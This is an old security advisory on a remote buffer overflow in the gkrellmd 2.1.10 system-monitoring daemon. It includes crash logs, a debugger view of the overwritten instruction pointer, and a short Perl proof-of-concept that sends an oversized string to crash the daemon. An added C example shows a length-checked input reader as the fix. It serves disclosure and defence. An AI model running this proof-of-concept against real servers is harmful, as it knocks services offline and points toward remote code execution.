
gkrellmd

Date: 24 Jun 2003 00:00:00
Reported by: dodo
Type: packetstorm
Source: packetstormsecurity.com

Gkrellmd 2.1.10 contains a remotely exploitable buffer overflow that allows code execution.

Code
`Gkrellmd 2.1.10 remote exploit (buffer overflow)  
date: 22-06-2003  
author: dodo [[email protected]]  
author-url: https://darkwired.ath.cx/  
  
- Description:  
Gkrellm is a GTK system monitoring utility; the latest version comes with a daemon.  
It's a great piece of software; however, the daemon needs more secure code.  
gkrellm/gkrellmd: http://www.gkrellm.net/  
  
- Exploitation:  
When a client sends data to gkrellmd, the daemon stores it in buffers  
but does not check it against the maximum buffer size (128 bytes).  
This can result in remote code execution or a crash of the daemon.  
  
- Details:  
  
verbose gkrellmd output:  
  
cyride-bash# gkrellmd -P 661 -V  
update_HZ=3  
connect string from client: gkrellm 2.1.10  
gkrellmd accepted client: dwop.darkwired.da.ru:43755  
received 141 bytes: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
Segmentation fault (core dumped)  
  
debugger output (eip):  
  
cyride-bash# gdb gkrellmd gkrellmd.core  
(gdb) info reg  
eip 0x41414141 0x41414141  
  
  
- Proof of concept:  
  
gkrellmcrash.pl:  
  
#!/usr/bin/perl -s  
use IO::Socket;  
#  
# proof of concept code  
# tested: gkrellmd 2.1.10  
#  
  
  
  
if(!$ARGV[0] || !$ARGV[1])  
{ print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); }  
  
$host = $ARGV[0];  
$port = $ARGV[1];  
$exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  
  
$socket = new IO::Socket::INET  
(  
Proto => "tcp",  
PeerAddr => $host,  
PeerPort => $port,  
);  
  
die "unable to connect to $host:$port ($!)\n" unless $socket;  
  
print $socket "gkrellm 2.1.10\n"; # tell the daemon which client we have  
sleep(1);  
print $socket $exploitstring;  
  
close($socket);  
  
- Vendor Response:  
vendor contacted on 22-06-2003  
http://www.gkrellm.net/`
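
The root cause described above is client data copied into a 128-byte buffer without a length check. As an added example (not gkrellmd's source and not part of the original advisory), here is a bounded line reader that rejects oversized input before copying. `read_client_line` and `CLIENT_BUF_SIZE` are hypothetical names, and the input is passed in memory rather than read from a socket.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CLIENT_BUF_SIZE 128 /* buffer size given in the advisory */

/* Hypothetical helper, not gkrellmd code.
 * Copies one newline-terminated line from `data` (`len` bytes as received)
 * into `buf`. Returns the line length on success, -1 if the line cannot fit
 * in `buf` (the caller should drop the connection), or -2 if no newline has
 * arrived yet and the data so far still fits. */
int read_client_line(const char *data, size_t len, char *buf, size_t buf_size)
{
    if (data == NULL || buf == NULL || buf_size == 0)
        return -1;

    const char *nl = memchr(data, '\n', len);
    size_t line_len = nl ? (size_t)(nl - data) : len;

    /* Check the length before copying; one byte is reserved for the NUL. */
    if (line_len >= buf_size)
        return -1;
    if (nl == NULL)
        return -2;

    memcpy(buf, data, line_len);
    buf[line_len] = '\0';
    return (int)line_len;
}

int main(void)
{
    char buf[CLIENT_BUF_SIZE];
    char oversized[141]; /* constructed: same length as the advisory's crash input */
    const char *hello = "gkrellm 2.1.10\n";

    memset(oversized, 'A', sizeof oversized);
    printf("handshake -> %d\n",
           read_client_line(hello, strlen(hello), buf, sizeof buf));
    printf("141 bytes -> %d\n",
           read_client_line(oversized, sizeof oversized, buf, sizeof buf));
    return 0;
}
```

Rejecting the connection on `-1` instead of truncating avoids processing a partially read command as if it were complete.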
